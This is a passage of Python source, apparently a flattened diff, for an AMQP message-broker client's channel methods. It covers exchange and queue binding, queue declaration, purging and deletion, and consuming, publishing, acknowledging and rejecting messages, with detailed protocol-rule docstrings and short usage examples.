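# a channel exception with reply code 404 (not found).
ch.exchange_declare('logs', 'topic', passive=True)

# Delete, but only while no queue bindings exist (if_unused=True).
ch.exchange_delete('logs', if_unused=True)
```
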
If the exchange has queue + bindings the server does not delete it but raises a + channel exception instead. + + RULE: + + If set, the server SHOULD delete the exchange but + only if it has no queue bindings. + + RULE: + + If set, the server SHOULD raise a channel + exception if the exchange is in use. + + nowait: boolean + + do not send a reply method + + If set, the server will not respond to the method. The + client should not wait for a reply method. If the + server could not complete the method it will raise a + channel or connection exception. + """ + return self.send_method( + spec.Exchange.Delete, argsig, (0, exchange, if_unused, nowait), + wait=None if nowait else spec.Exchange.DeleteOk, + ) + + def exchange_bind(self, destination, source='', routing_key='', + nowait=False, arguments=None, argsig='BsssbF'): + """Bind an exchange to an exchange. + + RULE: + + A server MUST allow and ignore duplicate bindings - that + is, two or more bind methods for a specific exchanges, + with identical arguments - without treating these as an + error. + + RULE: + + A server MUST allow cycles of exchange bindings to be + created including allowing an exchange to be bound to + itself. + + RULE: + + A server MUST not deliver the same message more than once + to a destination exchange, even if the topology of + exchanges and bindings results in multiple (even infinite) + routes to that exchange. + + PARAMETERS: + reserved-1: short + + destination: shortstr + + Specifies the name of the destination exchange to + bind. + + RULE: + + A client MUST NOT be allowed to bind a non- + existent destination exchange. + + RULE: + + The server MUST accept a blank exchange name to + mean the default exchange. + + source: shortstr + + Specifies the name of the source exchange to bind. + + RULE: + + A client MUST NOT be allowed to bind a non- + existent source exchange. + + RULE: + + The server MUST accept a blank exchange name to + mean the default exchange. + + routing-key: shortstr + + Specifies the routing key for the binding. The routing + key is used for routing messages depending on the + exchange configuration. Not all exchanges use a + routing key - refer to the specific exchange + documentation. + + no-wait: bit + + arguments: table + + A set of arguments for the binding. The syntax and + semantics of these arguments depends on the exchange + class. + """ + return self.send_method( + spec.Exchange.Bind, argsig, + (0, destination, source, routing_key, nowait, arguments), + wait=None if nowait else spec.Exchange.BindOk, + ) + + def exchange_unbind(self, destination, source='', routing_key='', + nowait=False, arguments=None, argsig='BsssbF'): + """Unbind an exchange from an exchange. + + RULE: + + If a unbind fails, the server MUST raise a connection + exception. + + PARAMETERS: + reserved-1: short + + destination: shortstr + + Specifies the name of the destination exchange to + unbind. + + RULE: + + The client MUST NOT attempt to unbind an exchange + that does not exist from an exchange. + + RULE: + + The server MUST accept a blank exchange name to + mean the default exchange. + + source: shortstr + + Specifies the name of the source exchange to unbind. + + RULE: + + The client MUST NOT attempt to unbind an exchange + from an exchange that does not exist. + + RULE: + + The server MUST accept a blank exchange name to + mean the default exchange. + + routing-key: shortstr + + Specifies the routing key of the binding to unbind. 
+ + no-wait: bit + + arguments: table + + Specifies the arguments of the binding to unbind. + """ + return self.send_method( + spec.Exchange.Unbind, argsig, + (0, destination, source, routing_key, nowait, arguments), + wait=None if nowait else spec.Exchange.UnbindOk, + ) + + ############# + # + # Queue + # + # + # work with queues + # + # Queues store and forward messages. Queues can be configured in + # the server or created at runtime. Queues must be attached to at + # least one exchange in order to receive messages from publishers. + # + # GRAMMAR:: + # + # queue = C:DECLARE S:DECLARE-OK + # / C:BIND S:BIND-OK + # / C:PURGE S:PURGE-OK + # / C:DELETE S:DELETE-OK + # + # RULE: + # + # A server MUST allow any content class to be sent to any + # queue, in any mix, and queue and delivery these content + # classes independently. Note that all methods that fetch + # content off queues are specific to a given content class. + # + + def queue_bind(self, queue, exchange='', routing_key='', + nowait=False, arguments=None, argsig='BsssbF'): + """Bind queue to an exchange. + + This method binds a queue to an exchange. Until a queue is + bound it will not receive any messages. In a classic + messaging model, store-and-forward queues are bound to a dest + exchange and subscription queues are bound to a dest_wild + exchange. + + RULE: + + A server MUST allow ignore duplicate bindings - that is, + two or more bind methods for a specific queue, with + identical arguments - without treating these as an error. + + RULE: + + If a bind fails, the server MUST raise a connection + exception. + + RULE: + + The server MUST NOT allow a durable queue to bind to a + transient exchange. If the client attempts this the server + MUST raise a channel exception. + + RULE: + + Bindings for durable queues are automatically durable and + the server SHOULD restore such bindings after a server + restart. + + RULE: + + The server SHOULD support at least 4 bindings per queue, + and ideally, impose no limit except as defined by + available resources. + + PARAMETERS: + queue: shortstr + + Specifies the name of the queue to bind. If the queue + name is empty, refers to the current queue for the + channel, which is the last declared queue. + + RULE: + + If the client did not previously declare a queue, + and the queue name in this method is empty, the + server MUST raise a connection exception with + reply code 530 (not allowed). + + RULE: + + If the queue does not exist the server MUST raise + a channel exception with reply code 404 (not + found). + + exchange: shortstr + + The name of the exchange to bind to. + + RULE: + + If the exchange does not exist the server MUST + raise a channel exception with reply code 404 (not + found). + + routing_key: shortstr + + message routing key + + Specifies the routing key for the binding. The + routing key is used for routing messages depending on + the exchange configuration. Not all exchanges use a + routing key - refer to the specific exchange + documentation. If the routing key is empty and the + queue name is empty, the routing key will be the + current queue for the channel, which is the last + declared queue. + + nowait: boolean + + do not send a reply method + + If set, the server will not respond to the method. The + client should not wait for a reply method. If the + server could not complete the method it will raise a + channel or connection exception. + + arguments: table + + arguments for binding + + A set of arguments for the binding. 
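
Exchange-to-exchange bindings (a RabbitMQ extension to AMQP 0-9-1) chain exchanges together, as the Bind/Unbind methods above describe. A sketch with illustrative exchange names; for fanout exchanges the routing key is ignored:

```python
ch.exchange_declare('ingest', 'fanout', durable=True, auto_delete=False)
ch.exchange_declare('audit', 'fanout', durable=True, auto_delete=False)

# Every message published to 'ingest' is now also routed through 'audit'.
ch.exchange_bind(destination='audit', source='ingest')

# ... later, remove the binding again:
ch.exchange_unbind(destination='audit', source='ingest')
```
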
The syntax and + semantics of these arguments depends on the exchange + class. + """ + return self.send_method( + spec.Queue.Bind, argsig, + (0, queue, exchange, routing_key, nowait, arguments), + wait=None if nowait else spec.Queue.BindOk, + ) + + def queue_unbind(self, queue, exchange, routing_key='', + nowait=False, arguments=None, argsig='BsssF'): + """Unbind a queue from an exchange. + + This method unbinds a queue from an exchange. + + RULE: + + If a unbind fails, the server MUST raise a connection exception. + + PARAMETERS: + queue: shortstr + + Specifies the name of the queue to unbind. + + RULE: + + The client MUST either specify a queue name or have + previously declared a queue on the same channel + + RULE: + + The client MUST NOT attempt to unbind a queue that + does not exist. + + exchange: shortstr + + The name of the exchange to unbind from. + + RULE: + + The client MUST NOT attempt to unbind a queue from an + exchange that does not exist. + + RULE: + + The server MUST accept a blank exchange name to mean + the default exchange. + + routing_key: shortstr + + routing key of binding + + Specifies the routing key of the binding to unbind. + + arguments: table + + arguments of binding + + Specifies the arguments of the binding to unbind. + """ + return self.send_method( + spec.Queue.Unbind, argsig, + (0, queue, exchange, routing_key, arguments), + wait=None if nowait else spec.Queue.UnbindOk, + ) + + def queue_declare(self, queue='', passive=False, durable=False, + exclusive=False, auto_delete=True, nowait=False, + arguments=None, argsig='BsbbbbbF'): + """Declare queue, create if needed. + + This method creates or checks a queue. When creating a new + queue the client can specify various properties that control + the durability of the queue and its contents, and the level of + sharing for the queue. + + RULE: + + The server MUST create a default binding for a newly- + created queue to the default exchange, which is an + exchange of type 'direct'. + + RULE: + + The server SHOULD support a minimum of 256 queues per + virtual host and ideally, impose no limit except as + defined by available resources. + + PARAMETERS: + queue: shortstr + + RULE: + + The queue name MAY be empty, in which case the + server MUST create a new queue with a unique + generated name and return this to the client in + the Declare-Ok method. + + RULE: + + Queue names starting with "amq." are reserved for + predeclared and standardised server queues. If + the queue name starts with "amq." and the passive + option is False, the server MUST raise a connection + exception with reply code 403 (access refused). + + passive: boolean + + do not create queue + + If set, the server will not create the queue. The + client can use this to check whether a queue exists + without modifying the server state. + + RULE: + + If set, and the queue does not already exist, the + server MUST respond with a reply code 404 (not + found) and raise a channel exception. + + durable: boolean + + request a durable queue + + If set when creating a new queue, the queue will be + marked as durable. Durable queues remain active when + a server restarts. Non-durable queues (transient + queues) are purged if/when a server restarts. Note + that durable queues do not necessarily hold persistent + messages, although it does not make sense to send + persistent messages to a transient queue. + + RULE: + + The server MUST recreate the durable queue after a + restart. + + RULE: + + The server MUST support both durable and transient + queues. 
+ + RULE: + + The server MUST ignore the durable field if the + queue already exists. + + exclusive: boolean + + request an exclusive queue + + Exclusive queues may only be consumed from by the + current connection. Setting the 'exclusive' flag + always implies 'auto-delete'. + + RULE: + + The server MUST support both exclusive (private) + and non-exclusive (shared) queues. + + RULE: + + The server MUST raise a channel exception if + 'exclusive' is specified and the queue already + exists and is owned by a different connection. + + auto_delete: boolean + + auto-delete queue when unused + + If set, the queue is deleted when all consumers have + finished using it. Last consumer can be cancelled + either explicitly or because its channel is closed. If + there was no consumer ever on the queue, it won't be + deleted. + + RULE: + + The server SHOULD allow for a reasonable delay + between the point when it determines that a queue + is not being used (or no longer used), and the + point when it deletes the queue. At the least it + must allow a client to create a queue and then + create a consumer to read from it, with a small + but non-zero delay between these two actions. The + server should equally allow for clients that may + be disconnected prematurely, and wish to re- + consume from the same queue without losing + messages. We would recommend a configurable + timeout, with a suitable default value being one + minute. + + RULE: + + The server MUST ignore the auto-delete field if + the queue already exists. + + nowait: boolean + + do not send a reply method + + If set, the server will not respond to the method. The + client should not wait for a reply method. If the + server could not complete the method it will raise a + channel or connection exception. + + arguments: table + + arguments for declaration + + A set of arguments for the declaration. The syntax and + semantics of these arguments depends on the server + implementation. This field is ignored if passive is + True. + + Returns a tuple containing 3 items: + the name of the queue (essential for automatically-named queues), + message count and + consumer count + """ + self.send_method( + spec.Queue.Declare, argsig, + (0, queue, passive, durable, exclusive, auto_delete, + nowait, arguments), + ) + if not nowait: + return queue_declare_ok_t(*self.wait( + spec.Queue.DeclareOk, returns_tuple=True, + )) + + def queue_delete(self, queue='', + if_unused=False, if_empty=False, nowait=False, + argsig='Bsbbb'): + """Delete a queue. + + This method deletes a queue. When a queue is deleted any + pending messages are sent to a dead-letter queue if this is + defined in the server configuration, and all consumers on the + queue are cancelled. + + RULE: + + The server SHOULD use a dead-letter queue to hold messages + that were pending on a deleted queue, and MAY provide + facilities for a system administrator to move these + messages back to an active queue. + + PARAMETERS: + queue: shortstr + + Specifies the name of the queue to delete. If the + queue name is empty, refers to the current queue for + the channel, which is the last declared queue. + + RULE: + + If the client did not previously declare a queue, + and the queue name in this method is empty, the + server MUST raise a connection exception with + reply code 530 (not allowed). + + RULE: + + The queue must exist. Attempting to delete a non- + existing queue causes a channel exception. 
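
`queue_declare` returns a `(queue, message_count, consumer_count)` tuple, which is the only way to learn the name of a server-named queue; `queue_bind` then attaches the queue to an exchange. A sketch using the predeclared `amq.topic` exchange; the queue name and routing key are illustrative:

```python
# Explicitly named, durable work queue.
ch.queue_declare('task_queue', durable=True, auto_delete=False)

# Server-named, exclusive queue: the broker generates a unique name and
# returns it in Queue.DeclareOk.
name, message_count, consumer_count = ch.queue_declare(exclusive=True)
ch.queue_bind(name, exchange='amq.topic', routing_key='kern.*')
```
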
+ + if_unused: boolean + + delete only if unused + + If set, the server will only delete the queue if it + has no consumers. If the queue has consumers the + server does does not delete it but raises a channel + exception instead. + + RULE: + + The server MUST respect the if-unused flag when + deleting a queue. + + if_empty: boolean + + delete only if empty + + If set, the server will only delete the queue if it + has no messages. If the queue is not empty the server + raises a channel exception. + + nowait: boolean + + do not send a reply method + + If set, the server will not respond to the method. The + client should not wait for a reply method. If the + server could not complete the method it will raise a + channel or connection exception. + + If nowait is False, returns the number of deleted messages. + """ + return self.send_method( + spec.Queue.Delete, argsig, + (0, queue, if_unused, if_empty, nowait), + wait=None if nowait else spec.Queue.DeleteOk, + ) + + def queue_purge(self, queue='', nowait=False, argsig='Bsb'): + """Purge a queue. + + This method removes all messages from a queue. It does not + cancel consumers. Purged messages are deleted without any + formal "undo" mechanism. + + RULE: + + A call to purge MUST result in an empty queue. + + RULE: + + On transacted channels the server MUST not purge messages + that have already been sent to a client but not yet + acknowledged. + + RULE: + + The server MAY implement a purge queue or log that allows + system administrators to recover accidentally-purged + messages. The server SHOULD NOT keep purged messages in + the same storage spaces as the live messages since the + volumes of purged messages may get very large. + + PARAMETERS: + queue: shortstr + + Specifies the name of the queue to purge. If the + queue name is empty, refers to the current queue for + the channel, which is the last declared queue. + + RULE: + + If the client did not previously declare a queue, + and the queue name in this method is empty, the + server MUST raise a connection exception with + reply code 530 (not allowed). + + RULE: + + The queue must exist. Attempting to purge a non- + existing queue causes a channel exception. + + nowait: boolean + + do not send a reply method + + If set, the server will not respond to the method. The + client should not wait for a reply method. If the + server could not complete the method it will raise a + channel or connection exception. + + If nowait is False, returns a number of purged messages. + """ + return self.send_method( + spec.Queue.Purge, argsig, (0, queue, nowait), + wait=None if nowait else spec.Queue.PurgeOk, + ) + + ############# + # + # Basic + # + # + # work with basic content + # + # The Basic class provides methods that support an industry- + # standard messaging model. + # + # GRAMMAR:: + # + # basic = C:QOS S:QOS-OK + # / C:CONSUME S:CONSUME-OK + # / C:CANCEL S:CANCEL-OK + # / C:PUBLISH content + # / S:RETURN content + # / S:DELIVER content + # / C:GET ( S:GET-OK content / S:GET-EMPTY ) + # / C:ACK + # / C:REJECT + # + # RULE: + # + # The server SHOULD respect the persistent property of basic + # messages and SHOULD make a best-effort to hold persistent + # basic messages on a reliable storage mechanism. + # + # RULE: + # + # The server MUST NOT discard a persistent basic message in + # case of a queue overflow. The server MAY use the + # Channel.Flow method to slow or stop a basic message + # publisher when necessary. 
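
The two destructive queue operations differ in scope: `queue_purge` drops the messages but keeps the queue, while `queue_delete` removes the queue itself, optionally only when unused or empty. Both return counts when `nowait` is left at False. A sketch with an illustrative queue name:

```python
purged = ch.queue_purge('task_queue')        # number of messages removed
deleted = ch.queue_delete('task_queue',      # number of messages the queue still held
                          if_unused=True, if_empty=False)
print(f'purged {purged} messages, deleted queue holding {deleted}')
```
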
+ # + # RULE: + # + # The server MAY overflow non-persistent basic messages to + # persistent storage and MAY discard or dead-letter non- + # persistent basic messages on a priority basis if the queue + # size exceeds some configured limit. + # + # RULE: + # + # The server MUST implement at least 2 priority levels for + # basic messages, where priorities 0-4 and 5-9 are treated as + # two distinct levels. The server MAY implement up to 10 + # priority levels. + # + # RULE: + # + # The server MUST deliver messages of the same priority in + # order irrespective of their individual persistence. + # + # RULE: + # + # The server MUST support both automatic and explicit + # acknowledgments on Basic content. + # + + def basic_ack(self, delivery_tag, multiple=False, argsig='Lb'): + """Acknowledge one or more messages. + + This method acknowledges one or more messages delivered via + the Deliver or Get-Ok methods. The client can ask to confirm + a single message or a set of messages up to and including a + specific message. + + PARAMETERS: + delivery_tag: longlong + + server-assigned delivery tag + + The server-assigned and channel-specific delivery tag + + RULE: + + The delivery tag is valid only within the channel + from which the message was received. I.e. a client + MUST NOT receive a message on one channel and then + acknowledge it on another. + + RULE: + + The server MUST NOT use a zero value for delivery + tags. Zero is reserved for client use, meaning "all + messages so far received". + + multiple: boolean + + acknowledge multiple messages + + If set to True, the delivery tag is treated as "up to + and including", so that the client can acknowledge + multiple messages with a single method. If set to + False, the delivery tag refers to a single message. + If the multiple field is True, and the delivery tag + is zero, tells the server to acknowledge all + outstanding messages. + + RULE: + + The server MUST validate that a non-zero delivery- + tag refers to an delivered message, and raise a + channel exception if this is not the case. + """ + return self.send_method( + spec.Basic.Ack, argsig, (delivery_tag, multiple), + ) + + def basic_cancel(self, consumer_tag, nowait=False, argsig='sb'): + """End a queue consumer. + + This method cancels a consumer. This does not affect already + delivered messages, but it does mean the server will not send + any more messages for that consumer. The client may receive + an arbitrary number of messages in between sending the cancel + method and receiving the cancel-ok reply. + + RULE: + + If the queue no longer exists when the client sends a + cancel command, or the consumer has been cancelled for + other reasons, this command has no effect. + + PARAMETERS: + consumer_tag: shortstr + + consumer tag + + Identifier for the consumer, valid within the current + connection. + + RULE: + + The consumer tag is valid only within the channel + from which the consumer was created. I.e. a client + MUST NOT create a consumer in one channel and then + use it in another. + + nowait: boolean + + do not send a reply method + + If set, the server will not respond to the method. The + client should not wait for a reply method. If the + server could not complete the method it will raise a + channel or connection exception. 
+ """ + if self.connection is not None: + self.no_ack_consumers.discard(consumer_tag) + return self.send_method( + spec.Basic.Cancel, argsig, (consumer_tag, nowait), + wait=None if nowait else spec.Basic.CancelOk, + ) + + def _on_basic_cancel(self, consumer_tag): + """Consumer cancelled by server. + + Most likely the queue was deleted. + + """ + callback = self._remove_tag(consumer_tag) + if callback: + callback(consumer_tag) + else: + raise ConsumerCancelled(consumer_tag, spec.Basic.Cancel) + + def _on_basic_cancel_ok(self, consumer_tag): + self._remove_tag(consumer_tag) + + def _remove_tag(self, consumer_tag): + self.callbacks.pop(consumer_tag, None) + return self.cancel_callbacks.pop(consumer_tag, None) + + def basic_consume(self, queue='', consumer_tag='', no_local=False, + no_ack=False, exclusive=False, nowait=False, + callback=None, arguments=None, on_cancel=None, + argsig='BssbbbbF'): + """Start a queue consumer. + + This method asks the server to start a "consumer", which is a + transient request for messages from a specific queue. + Consumers last as long as the channel they were created on, or + until the client cancels them. + + RULE: + + The server SHOULD support at least 16 consumers per queue, + unless the queue was declared as private, and ideally, + impose no limit except as defined by available resources. + + PARAMETERS: + queue: shortstr + + Specifies the name of the queue to consume from. If + the queue name is null, refers to the current queue + for the channel, which is the last declared queue. + + RULE: + + If the client did not previously declare a queue, + and the queue name in this method is empty, the + server MUST raise a connection exception with + reply code 530 (not allowed). + + consumer_tag: shortstr + + Specifies the identifier for the consumer. The + consumer tag is local to a connection, so two clients + can use the same consumer tags. If this field is empty + the server will generate a unique tag. + + RULE: + + The tag MUST NOT refer to an existing consumer. If + the client attempts to create two consumers with + the same non-empty tag the server MUST raise a + connection exception with reply code 530 (not + allowed). + + no_local: boolean + + do not deliver own messages + + If the no-local field is set the server will not send + messages to the client that published them. + + no_ack: boolean + + no acknowledgment needed + + If this field is set the server does not expect + acknowledgments for messages. That is, when a message + is delivered to the client the server automatically and + silently acknowledges it on behalf of the client. This + functionality increases performance but at the cost of + reliability. Messages can get lost if a client dies + before it can deliver them to the application. + + exclusive: boolean + + request exclusive access + + Request exclusive consumer access, meaning only this + consumer can access the queue. + + RULE: + + If the server cannot grant exclusive access to the + queue when asked, - because there are other + consumers active - it MUST raise a channel + exception with return code 403 (access refused). + + nowait: boolean + + do not send a reply method + + If set, the server will not respond to the method. The + client should not wait for a reply method. If the + server could not complete the method it will raise a + channel or connection exception. 
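
Besides client-side cancellation via `basic_cancel`, the broker itself may cancel a consumer (for example when its queue is deleted); `_on_basic_cancel` above then either calls the `on_cancel` callback registered with `basic_consume` or raises `ConsumerCancelled`. A sketch; `handle` and the queue name are illustrative:

```python
def handle(msg):
    msg.channel.basic_ack(msg.delivery_info['delivery_tag'])

def on_cancel(consumer_tag):
    # Called if the broker cancels the consumer, e.g. because the queue vanished.
    print('consumer cancelled by server:', consumer_tag)

tag = ch.basic_consume(queue='task_queue', callback=handle, on_cancel=on_cancel)
# ... later, cancel from the client side:
ch.basic_cancel(tag)
```
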
+ + callback: Python callable + + function/method called with each delivered message + + For each message delivered by the broker, the + callable will be called with a Message object + as the single argument. If no callable is specified, + messages are quietly discarded, no_ack should probably + be set to True in that case. + """ + p = self.send_method( + spec.Basic.Consume, argsig, + ( + 0, queue, consumer_tag, no_local, no_ack, exclusive, + nowait, arguments + ), + wait=None if nowait else spec.Basic.ConsumeOk, + returns_tuple=True + ) + + if not nowait: + # send_method() returns (consumer_tag,) tuple. + # consumer_tag is returned by broker using following rules: + # * consumer_tag is not specified by client, random one + # is generated by Broker + # * consumer_tag is provided by client, the same one + # is returned by broker + consumer_tag = p[0] + elif nowait and not consumer_tag: + raise ValueError( + 'Consumer tag must be specified when nowait is True' + ) + + self.callbacks[consumer_tag] = callback + + if on_cancel: + self.cancel_callbacks[consumer_tag] = on_cancel + if no_ack: + self.no_ack_consumers.add(consumer_tag) + + if not nowait: + return consumer_tag + else: + return p + + def _on_basic_deliver(self, consumer_tag, delivery_tag, redelivered, + exchange, routing_key, msg): + msg.channel = self + msg.delivery_info = { + 'consumer_tag': consumer_tag, + 'delivery_tag': delivery_tag, + 'redelivered': redelivered, + 'exchange': exchange, + 'routing_key': routing_key, + } + + try: + fun = self.callbacks[consumer_tag] + except KeyError: + AMQP_LOGGER.warning( + REJECTED_MESSAGE_WITHOUT_CALLBACK, + delivery_tag, consumer_tag, exchange, routing_key, + ) + self.basic_reject(delivery_tag, requeue=True) + else: + fun(msg) + + def basic_get(self, queue='', no_ack=False, argsig='Bsb'): + """Direct access to a queue. + + This method provides a direct access to the messages in a + queue using a synchronous dialogue that is designed for + specific types of application where synchronous functionality + is more important than performance. + + PARAMETERS: + queue: shortstr + + Specifies the name of the queue to consume from. If + the queue name is null, refers to the current queue + for the channel, which is the last declared queue. + + RULE: + + If the client did not previously declare a queue, + and the queue name in this method is empty, the + server MUST raise a connection exception with + reply code 530 (not allowed). + + no_ack: boolean + + no acknowledgment needed + + If this field is set the server does not expect + acknowledgments for messages. That is, when a message + is delivered to the client the server automatically and + silently acknowledges it on behalf of the client. This + functionality increases performance but at the cost of + reliability. Messages can get lost if a client dies + before it can deliver them to the application. + + Non-blocking, returns a amqp.basic_message.Message object, + or None if queue is empty. 
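
In push mode a consumer registers a callback and the application then blocks in `Connection.drain_events()`, which reads frames and dispatches deliveries through `_on_basic_deliver`; `basic_get` (documented above) is the pull-mode alternative. A sketch with an illustrative queue name:

```python
def on_message(msg):
    print('received:', msg.body)
    msg.channel.basic_ack(msg.delivery_info['delivery_tag'])

ch.basic_consume(queue='task_queue', callback=on_message)
for _ in range(10):          # dispatch the next ten inbound frames
    conn.drain_events()      # blocks until a frame arrives

# Pull-mode alternative: returns a Message, or None when the queue is empty.
msg = ch.basic_get('task_queue')
if msg is not None:
    ch.basic_ack(msg.delivery_info['delivery_tag'])
    print('polled:', msg.body)
```
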
+ """ + ret = self.send_method( + spec.Basic.Get, argsig, (0, queue, no_ack), + wait=[spec.Basic.GetOk, spec.Basic.GetEmpty], returns_tuple=True, + ) + if not ret or len(ret) < 2: + return self._on_get_empty(*ret) + return self._on_get_ok(*ret) + + def _on_get_empty(self, cluster_id=None): + pass + + def _on_get_ok(self, delivery_tag, redelivered, exchange, routing_key, + message_count, msg): + msg.channel = self + msg.delivery_info = { + 'delivery_tag': delivery_tag, + 'redelivered': redelivered, + 'exchange': exchange, + 'routing_key': routing_key, + 'message_count': message_count + } + return msg + + def _basic_publish(self, msg, exchange='', routing_key='', + mandatory=False, immediate=False, timeout=None, + confirm_timeout=None, + argsig='Bssbb'): + """Publish a message. + + This method publishes a message to a specific exchange. The + message will be routed to queues as defined by the exchange + configuration and distributed to any active consumers when the + transaction, if any, is committed. + + When channel is in confirm mode (when Connection parameter + confirm_publish is set to True), each message is confirmed. + When broker rejects published message (e.g. due internal broker + constrains), MessageNacked exception is raised and + set confirm_timeout to wait maximum confirm_timeout second + for message to confirm. + + PARAMETERS: + exchange: shortstr + + Specifies the name of the exchange to publish to. The + exchange name can be empty, meaning the default + exchange. If the exchange name is specified, and that + exchange does not exist, the server will raise a + channel exception. + + RULE: + + The server MUST accept a blank exchange name to + mean the default exchange. + + RULE: + + The exchange MAY refuse basic content in which + case it MUST raise a channel exception with reply + code 540 (not implemented). + + routing_key: shortstr + + Message routing key + + Specifies the routing key for the message. The + routing key is used for routing messages depending on + the exchange configuration. + + mandatory: boolean + + indicate mandatory routing + + This flag tells the server how to react if the message + cannot be routed to a queue. If this flag is True, the + server will return an unroutable message with a Return + method. If this flag is False, the server silently + drops the message. + + RULE: + + The server SHOULD implement the mandatory flag. + + immediate: boolean + + request immediate delivery + + This flag tells the server how to react if the message + cannot be routed to a queue consumer immediately. If + this flag is set, the server will return an + undeliverable message with a Return method. If this + flag is zero, the server will queue the message, but + with no guarantee that it will ever be consumed. + + RULE: + + The server SHOULD implement the immediate flag. + + timeout: short + + timeout for publish + + Set timeout to wait maximum timeout second + for message to publish. + + confirm_timeout: short + + confirm_timeout for publish in confirm mode + + When the channel is in confirm mode set + confirm_timeout to wait maximum confirm_timeout + second for message to confirm. + + """ + if not self.connection: + raise RecoverableConnectionError( + 'basic_publish: connection closed') + + capabilities = self.connection. 
\ + client_properties.get('capabilities', {}) + if capabilities.get('connection.blocked', False): + try: + # Check if an event was sent, such as the out of memory message + self.connection.drain_events(timeout=0) + except socket.timeout: + pass + + try: + with self.connection.transport.having_timeout(timeout): + return self.send_method( + spec.Basic.Publish, argsig, + (0, exchange, routing_key, mandatory, immediate), msg + ) + except socket.timeout: + raise RecoverableChannelError('basic_publish: timed out') + + basic_publish = _basic_publish + + def basic_publish_confirm(self, *args, **kwargs): + confirm_timeout = kwargs.pop('confirm_timeout', None) + + def confirm_handler(method, *args): + # When RMQ nacks message we are raising MessageNacked exception + if method == spec.Basic.Nack: + raise MessageNacked() + + if not self._confirm_selected: + self._confirm_selected = True + self.confirm_select() + ret = self._basic_publish(*args, **kwargs) + # Waiting for confirmation of message. + timeout = confirm_timeout or kwargs.get('timeout', None) + self.wait([spec.Basic.Ack, spec.Basic.Nack], + callback=confirm_handler, + timeout=timeout) + return ret + + def basic_qos(self, prefetch_size, prefetch_count, a_global, + argsig='lBb'): + """Specify quality of service. + + This method requests a specific quality of service. The QoS + can be specified for the current channel or for all channels + on the connection. The particular properties and semantics of + a qos method always depend on the content class semantics. + Though the qos method could in principle apply to both peers, + it is currently meaningful only for the server. + + PARAMETERS: + prefetch_size: long + + prefetch window in octets + + The client can request that messages be sent in + advance so that when the client finishes processing a + message, the following message is already held + locally, rather than needing to be sent down the + channel. Prefetching gives a performance improvement. + This field specifies the prefetch window size in + octets. The server will send a message in advance if + it is equal to or smaller in size than the available + prefetch size (and also falls into other prefetch + limits). May be set to zero, meaning "no specific + limit", although other prefetch limits may still + apply. The prefetch-size is ignored if the no-ack + option is set. + + RULE: + + The server MUST ignore this setting when the + client is not processing any messages - i.e. the + prefetch size does not limit the transfer of + single messages to a client, only the sending in + advance of more messages while the client still + has one or more unacknowledged messages. + + prefetch_count: short + + prefetch window in messages + + Specifies a prefetch window in terms of whole + messages. This field may be used in combination with + the prefetch-size field; a message will only be sent + in advance if both prefetch windows (and those at the + channel and connection level) allow it. The prefetch- + count is ignored if the no-ack option is set. + + RULE: + + The server MAY send less data in advance than + allowed by the client's specified prefetch windows + but it MUST NOT send more. + + a_global: boolean + + Defines a scope of QoS. 
Semantics of this parameter differs + between AMQP 0-9-1 standard and RabbitMQ broker: + + MEANING IN AMQP 0-9-1: + False: shared across all consumers on the channel + True: shared across all consumers on the connection + MEANING IN RABBITMQ: + False: applied separately to each new consumer + on the channel + True: shared across all consumers on the channel + """ + return self.send_method( + spec.Basic.Qos, argsig, (prefetch_size, prefetch_count, a_global), + wait=spec.Basic.QosOk, + ) + + def basic_recover(self, requeue=False): + """Redeliver unacknowledged messages. + + This method asks the broker to redeliver all unacknowledged + messages on a specified channel. Zero or more messages may be + redelivered. This method is only allowed on non-transacted + channels. + + RULE: + + The server MUST set the redelivered flag on all messages + that are resent. + + RULE: + + The server MUST raise a channel exception if this is + called on a transacted channel. + + PARAMETERS: + requeue: boolean + + requeue the message + + If this field is False, the message will be redelivered + to the original recipient. If this field is True, the + server will attempt to requeue the message, + potentially then delivering it to an alternative + subscriber. + """ + return self.send_method(spec.Basic.Recover, 'b', (requeue,)) + + def basic_recover_async(self, requeue=False): + return self.send_method(spec.Basic.RecoverAsync, 'b', (requeue,)) + + def basic_reject(self, delivery_tag, requeue, argsig='Lb'): + """Reject an incoming message. + + This method allows a client to reject a message. It can be + used to interrupt and cancel large incoming messages, or + return untreatable messages to their original queue. + + RULE: + + The server SHOULD be capable of accepting and process the + Reject method while sending message content with a Deliver + or Get-Ok method. I.e. the server should read and process + incoming methods while sending output frames. To cancel a + partially-send content, the server sends a content body + frame of size 1 (i.e. with no data except the frame-end + octet). + + RULE: + + The server SHOULD interpret this method as meaning that + the client is unable to process the message at this time. + + RULE: + + A client MUST NOT use this method as a means of selecting + messages to process. A rejected message MAY be discarded + or dead-lettered, not necessarily passed to another + client. + + PARAMETERS: + delivery_tag: longlong + + server-assigned delivery tag + + The server-assigned and channel-specific delivery tag + + RULE: + + The delivery tag is valid only within the channel + from which the message was received. I.e. a client + MUST NOT receive a message on one channel and then + acknowledge it on another. + + RULE: + + The server MUST NOT use a zero value for delivery + tags. Zero is reserved for client use, meaning "all + messages so far received". + + requeue: boolean + + requeue the message + + If this field is False, the message will be discarded. + If this field is True, the server will attempt to + requeue the message. + + RULE: + + The server MUST NOT deliver the message to the + same client within the context of the current + channel. The recommended strategy is to attempt + to deliver the message to an alternative consumer, + and if that is not possible, to move the message + to a dead-letter queue. The server MAY use more + sophisticated tracking to hold the message on the + queue and redeliver it to the same client at a + later stage. 
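
`basic_qos` and `basic_reject` usually work together in a worker: the prefetch count caps how many unacknowledged deliveries the broker pushes at once, and failed messages are handed back to the queue with `requeue=True`. Note that on RabbitMQ, `a_global=False` applies the limit per consumer. A sketch; `process` is a hypothetical application function and the queue name is illustrative:

```python
ch.basic_qos(0, 10, False)   # prefetch_size=0 (no byte limit), at most 10 unacked messages

def handle(msg):
    tag = msg.delivery_info['delivery_tag']
    try:
        process(msg.body)                        # hypothetical application-level handler
    except Exception:
        ch.basic_reject(tag, requeue=True)       # put the message back on the queue
    else:
        ch.basic_ack(tag)

ch.basic_consume(queue='jobs', callback=handle)
```
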
